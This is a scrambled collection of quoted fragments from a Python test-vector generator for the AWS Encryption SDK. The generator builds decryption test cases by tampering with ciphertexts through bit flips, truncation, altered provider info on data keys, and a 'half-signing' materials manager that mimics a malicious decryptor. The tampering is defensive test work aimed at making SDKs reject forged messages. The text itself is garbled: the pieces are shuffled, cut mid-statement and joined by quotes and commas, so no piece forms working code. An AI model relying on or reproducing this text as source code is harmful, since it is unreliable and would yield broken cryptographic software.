tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario,", "supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self,", "file except in compliance with the License. A copy of", "result. return: a list of (ciphertext, result) pairs \"\"\" materials_manager", "materials by requesting signing materials from the wrapped default CMM,", "feature #0006 AWS Encryption SDK Decrypt Message Generation. :param int", "plaintexts_specs: Mapping of plaintext name to size in bytes :return:", "= attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new CMM", "EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create a", "the input or the result. 
return: a list of (ciphertext,", "\"\"\"Tampering method that changes the provider info on all EDKs.\"\"\"", "generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering with the", "single bit flipped, for every possible bit.\"\"\" # pylint: disable=R0201", "Create a new CMM that wraps a new DefaultCryptoMaterialsManager based", "spec == \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\": return", "the License for the specific # language governing permissions and", "dict plaintexts: Mapping of plaintext names to plaintext values :param", "noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import ( # noqa pylint:", "TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good message at every", "target_directory: Directory in which to write all output :param int", "by requesting signing materials from the wrapped default CMM, and", "decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result: \"\"\"", "[ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for new_provider_info in", "unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption context. THIS", "-> None \"\"\"Process all known encrypt test scenarios and write", "Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method =", "Iterable of master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec`", "result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer,", "{name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()} ciphertext_writer =", "plaintext values :param dict tests: Mapping of test scenario names", "wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint:", "scenario that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return", "ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted", "ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios", "disable=too-many-instance-attributes \"\"\"Data class for a single full message decrypt test", "awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer,", "Described in AWS Crypto Tools Test Vector Framework feature #0006", "DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator,", ") def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the", "= generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return", "given new 
provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def", "ImportError: # pragma: no cover # We only actually need", ") return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm, new_provider_info ) for", "for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self,", "attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod", "raise ValueError(\"Unrecognized tampering method tag: \" + tampering_tag) # pylint:", "for an unsigned algorithm suite that includes the \"aws-crypto-public-key\" encryption", "None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, )", "\"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the", "bit flipped, for every possible bit.\"\"\" # pylint: disable=R0201 def", "= cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name, scenario in raw_manifest[\"tests\"].items():", "def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption", "that wraps a the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info", "from a decrypted signed message, and therefore this is an", "return: a list of (ciphertext, result) pairs. 
\"\"\" master_key_provider =", "ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption scenario) pair\"\"\" ciphertext_name", "uuid from copy import copy import attr import six from", "import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite", "MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method,", "ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that", "from the wrapped default CMM, and then changing the algorithm", "a new DefaultCryptoMaterialsManager based on the given master key provider.", ") return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\"", "for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario,", "ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)), ) for length in", "= generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result =", "aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs", "decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in", "\"License\"). You # may not use this file except in", ":class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts =", "tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError: continue", "or its affiliates. All Rights Reserved. # # Licensed under", "from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method:", "to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class", "decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec =", "try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except NotImplementedError:", "new instance for a given new provider info value.\"\"\" self.new_provider_infos", "a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario. :param callable", "CMM to avoid generating a new data key every time.", "is an important case for ESDKs to reject. \"\"\" wrapped_default_cmm", "the result. return: a list of (ciphertext, result) pairs \"\"\"", "plaintexts: Mapping of plaintext names to plaintext values :return: Loaded", "KIND, either express or implied. See the License for the", "MESSAGES and should never be used in production! 
\"\"\" wrapped_cmm", "# pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run", "plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\")", "ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method,", "MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest handler. Described", "generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)),", "single full message decrypt test scenario. Handles serialization and deserialization", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "data key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager(", "modules from typing import IO, Callable, Dict, Iterable, Optional #", "attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from a", "Apache License, Version 2.0 (the \"License\"). You # may not", "self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() }", "SDK Decrypt Message Generation manifest handler. Described in AWS Crypto", "from_values_spec(cls, values_spec): \"\"\"Load from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec)", "ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies the provider info field", "copy import attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from", "ciphertext\"\"\" byte_index, bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index]", "use this file except in compliance with the License. A", "file input_file: File object for file containing JSON manifest :return:", ") return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\"", "return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create", "new data key every time. 
cache = LocalCryptoMaterialsCache(10) caching_cmm =", "http://aws.amazon.com/apache2.0/ # # or in the \"license\" file accompanying this", ") return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering", "master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1 have incompatible typing", "the provider info on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))", "AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0", "this file. This file is # distributed on an \"AS", "a new (name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri", "only the given bit in the given ciphertext\"\"\" byte_index, bit_index", "tampering with the input or the result. return: a list", "return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), )", "attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager, new_provider_info): \"\"\"Create a", "with a public key\" ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)", "signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key", "LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from", "a list of (ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager(", "class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials for an", "plaintext_uri): \"\"\" Run a given scenario, tampering with the input", "CMM that generates materials for an unsigned algorithm suite that", "CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method", ":return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"]", "NotImplementedError( \"The half-sign tampering method is only supported on the", "MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt,", "from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201", "run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process", "DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from", "tampering_materials_manager = HalfSigningCryptoMaterialsManager( 
generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result =", "of (ciphertext, result) pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [", "materials from the wrapped CMM, and then change the provider", "import os import uuid from copy import copy import attr", "cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer, generation_scenario, caching_cmm,", "encrypt manifest. :param file input_file: File object for file containing", "Dict, Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import", "ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering with", "Rights Reserved. # # Licensed under the Apache License, Version", "the provider info on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request)", "either express or implied. See the License for the specific", "= attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result", "import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import ENCODING", "in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\",", ":type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param result:", "\"\"\" if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm =", "and manifests to disk. :param str target_directory: Directory in which", "= attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new CMM", "and 3.5.1 have incompatible typing modules from typing import IO,", "\"license\" file accompanying this file. 
This file is # distributed", "new CMM that wraps a new DefaultCryptoMaterialsManager based on the", ":class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of master key specifications", "return TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if spec", "Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK", "plaintext name to size in bytes :return: Mapping of plaintext", "= self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks to the", "provider info value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec):", "ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of", "def __init__(self, new_provider_infos): \"\"\"Create a new instance for a given", "] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info", "encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering =", "tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self,", "- 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces", "to avoid generating a new data key every time. cache", "\"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a", "plaintext name to randomly generated bytes :rtype: dict \"\"\" return", "of (ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() )", "imports when running the mypy checks pass SUPPORTED_VERSIONS = (2,)", "\"\"\"Create a new CMM that wraps a the given CMM.\"\"\"", "Licensed under the Apache License, Version 2.0 (the \"License\"). You", "resulting data and manifests to disk. :param str target_directory: Directory", "from aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm", "membership_validator, validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult,", "to the wrapped default CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object):", "Loaded keys :param dict plaintexts: Mapping of plaintext names to", "all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):", "of # the License is located at # # http://aws.amazon.com/apache2.0/", "reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts", "= attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): #", "info on each EDK. 
\"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key", "decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario", "this is an important case for ESDKs to reject. \"\"\"", "return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8 class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import", "pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a", "HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on all", "decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result, ) def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario,", "MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys,", "plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios )", "each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys:", "values :param dict tests: Mapping of test scenario names to", "the given master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def", "expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info: \"", "] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info", "import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager", "default CMM, and then changing the algorithm suite and removing", "@classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given bit", "def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given scenario,", "malicious decryptor without encryption permissions might do, to attempt to", "value.\"\"\" self.new_provider_infos = new_provider_infos @classmethod def from_values_spec(cls, values_spec): \"\"\"Load from", "and return a URI locating the written data :param str", "awses_test_vectors.internal.util import ( dictionary_validator, file_reader, file_writer, iterable_validator, membership_validator, validate_manifest_type, )", "# Python 3.5.0 and 3.5.1 have incompatible typing modules from", ":param KeysManifest keys: Loaded keys :param dict plaintexts: Mapping of", "test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario =", "root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\"))", "import json import os import uuid from copy import copy", "Python 3.5.0 and 3.5.1 have incompatible typing modules from typing", "import uuid from copy import copy import attr import six", 
"attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts):", "[ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return", "MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key with a public", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {} flipped\".format(bit)), ) for bit", "new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials from the wrapped", "return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class", "case for ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def", "= scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None if", "aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import", "pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma: no", "the License. \"\"\" AWS Encryption SDK Decrypt Message Generation manifest", "in AWS Crypto Tools Test Vector Framework feature #0006 AWS", "new CMM that wraps a the given CMM.\"\"\" self.wrapped_cmm =", "a scenario specification. :param dict scenario: Scenario specification JSON :param", "result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load", "a file containing a full message encrypt manifest. :param file", "the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri))", "See the License for the specific # language governing permissions", "expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials", "- bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method", "a data key with a public key\" ) return [", "\"\"\" Create a new CMM that wraps a new DefaultCryptoMaterialsManager", "def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required", "for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls, spec): \"\"\"Load from", "parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "[ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that", "info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result", "\"\"\" AWS Encryption SDK Decrypt Message Generation manifest handler. 
Described", "dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a", "from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching", "Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name,", "scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec,", "= os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys =", "run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering", "return a URI locating the written data :param str plaintext_uri:", "ValueError(\"Unrecognized tampering method tag: \" + tampering_tag) # pylint: disable=R0201", "+ new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class", "file containing JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\"", "plaintexts_specs.items()} @classmethod def from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest", "#0006 AWS Encryption SDK Decrypt Message Generation. :param int version:", "scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name]", "AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite from", "new DefaultCryptoMaterialsManager based on the given master key provider. \"\"\"", "of plaintext names to plaintext values :param dict tests: Mapping", "\"aws-crypto-public-key\" encryption context. THIS IS ONLY USED TO CREATE INVALID", "= divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1 <<", "ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result, ), ) @attr.s class MessageDecryptionGenerationManifest(object):", "= MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering)", "express or implied. See the License for the specific #", "expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt,", "used in production! 
It is imitating what a malicious decryptor", ":param Callable decryption_master_key_provider_fn: :param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method", "class TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\" @classmethod def", "wraps a the given CMM.\"\"\" self.wrapped_cmm = materials_manager self.new_provider_info =", "= json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name))", "method that truncates a good message at every byte (except", "JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest \"\"\" raw_manifest =", "os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file):", "= file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario for name,", "attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base import", "request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY: signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result", "forge an unsigned message from a decrypted signed message, and", "pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a", "= MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info: \" +", "Encryption SDK Decryption Message Generation manifest handler. Described in AWS", "request.algorithm result.signing_key = None return result raise NotImplementedError( \"The half-sign", "these imports when running the mypy checks pass SUPPORTED_VERSIONS =", "bit): \"\"\"Flip only the given bit in the given ciphertext\"\"\"", "BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the", "\"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result", "-> Dict[str, bytes] \"\"\"Generate required plaintext values. :param dict plaintexts_specs:", ":class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario. :param callable ciphertext_writer:", "located at # # http://aws.amazon.com/apache2.0/ # # or in the", "= new_provider_info def get_encryption_materials(self, request): \"\"\" Request materials from the", "a URI locating the written data :param str plaintext_uri: URI", "the result. return: a list of (ciphertext, result) pairs. 
